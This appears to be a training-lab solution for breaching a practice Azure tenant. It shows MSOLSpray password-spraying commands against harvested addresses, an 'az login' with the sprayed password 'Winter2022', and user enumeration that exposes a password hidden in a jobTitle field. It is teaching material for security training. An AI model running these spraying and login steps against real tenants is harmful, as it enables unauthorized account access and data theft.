Breaching Azure Intro
Introduction to Azure
Breaching SolarDrops
Breaching Bogus Bank

BA Lab 04 – Solution

For the purpose of this lab we need to navigate to:  https://solardropsuserfiles.azurewebsites.net/#team again and collect the email address.

Full NameEmail Address
Jhon MickelJhon@SolarDrops.onmicrosoft.com
James Arnoldjames@SolarDrops.onmicrosoft.com
Lellien LindaLellien@SolarDrops.onmicrosoft.com
Powel Jopowel@SolarDrops.onmicrosoft.com
SolarDropssolardrops@SolarDrops.onmicrosoft.com
Kenken@SolarDrops.onmicrosoft.com
Nicknick@SolarDrops.onmicrosoft.com
Jackjack@SolarDrops.onmicrosoft.com

Then we need to create a list with these email addresses and run MSOLSpray Tool in order to find valid credentials. Attackers often leverage well-known or easily guessable passwords, such as “password123” or variations.

In addition to generic passwords, attackers may also incorporate targeted elements such as seasons, football teams, or birthdates, tailoring their approach based on commonly used passwords within the specific organization or industry. This strategy aims to increase the likelihood of success without triggering account lockouts, allowing attackers to test a large number of accounts with minimal risk of detection. 

Import-Module C:\Users\cbasupport\Desktop\Tools\BreachingAzureTools\MSOLSpray-master\MSOLSpray.ps1
cd C:\Users\cbasupport\Desktop\Tools\BreachingAzureTools\MSOLSpray
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2022    

Output:

[*] There are 5 total users to spray.                                                                                                                                   [*] Now spraying Microsoft Online.                                                                                                                                      [*] Current date and time: 04/18/2022 14:22:05                                                                                                                          [*] WARNING! The user jhon@SolarDrops.onmicrosoft.com doesn't exist.
[*] SUCCESS! james@SolarDrops.onmicrosoft.com : Winter2022
[*] WARNING! The user Lellien@SolarDrops.onmicrosoft.com doesn't exist.
[*] WARNING! The user powel@SolarDrops.onmicrosoft.com doesn't exist.
[*] SUCCESS! solardrops@SolarDrops.onmicrosoft.com : Winter2022

We managed to find two users who use Winter2022 as their password. Our next step is to attempt logging in using the Azure (az) module, leveraging the identified password. This strategic move is aimed at gaining unauthorized access to the Azure environment, with the goal of exploring further and potentially compromising sensitive resources or data.

The “az” module, short for the Azure Command-Line Interface (CLI), serves as a powerful tool for efficiently managing Azure resources and services. This command-line interface offers a set of commands that allow users to interact with and control their Azure environment directly from a terminal or command prompt. With the “az” CLI, users can perform a range of tasks, including resource management, deployment of Azure resources and applications through Azure Resource Manager (ARM) templates, scripting for automation of repetitive tasks, access control and permissions management using Entra ID and role-based access control (RBAC), as well as monitoring and diagnostics of Azure resources.

Additionally, the “az” CLI seamlessly integrates with Azure DevOps, making it a versatile and essential tool for Azure administrators, developers, and DevOps professionals who prefer command-line interaction and scripting to manage their Azure infrastructure and applications efficiently.

Use the credentials of one of the compromised user and login using az module:

az login -u "james@SolarDrops.onmicrosoft.com" -p "Winter2022" --allow-no-subscriptions

Output:

c620c085-2058-4f82-9f80-13165b0034ed 'SolarDrops'
[
  {
    "cloudName": "AzureCloud",
    "id": "c620c085-2058-4f82-9f80-13165b0034ed",
    "isDefault": true,
    "name": "N/A(tenant level account)",
    "state": "Enabled",
    "tenantId": "c620c085-2058-4f82-9f80-13165b0034ed",
    "user": {
      "name": "james@SolarDrops.onmicrosoft.com",
      "type": "user"
    }
  }
]

By including the –allow-no-subscriptions flag in your command, you explicitly indicate that the command should proceed even if there is no active subscription. This can be useful in situations where you want to perform tasks that don’t require a specific subscription, such as listing available extensions or querying general Azure information.

In our case, James doesn’t have any subscription assigned to his Entra ID account. Thus, –allow-no-subscriptions is required in order to authenticate using az module.

The next step is to start enumeration the Entra ID users:

az ad user list
[
  {
    "accountEnabled": true,
    "companyName": "SolarDrops Comp",
    "displayName": "james",
    "employeeId": null,
    "facsimileTelephoneNumber": null,
    "jobTitle": "Username: localpaul, Password Part 3/3: JYql IP: 10.0.2.5",

The enumeration of Azure AD users is a crucial step in security assessments, as it allows for the discovery of potential sensitive information that administrators may have added to user attributes.

In this case, we found valuable data within the JobTitle attribute and eventually found the complete password of the user localpaul.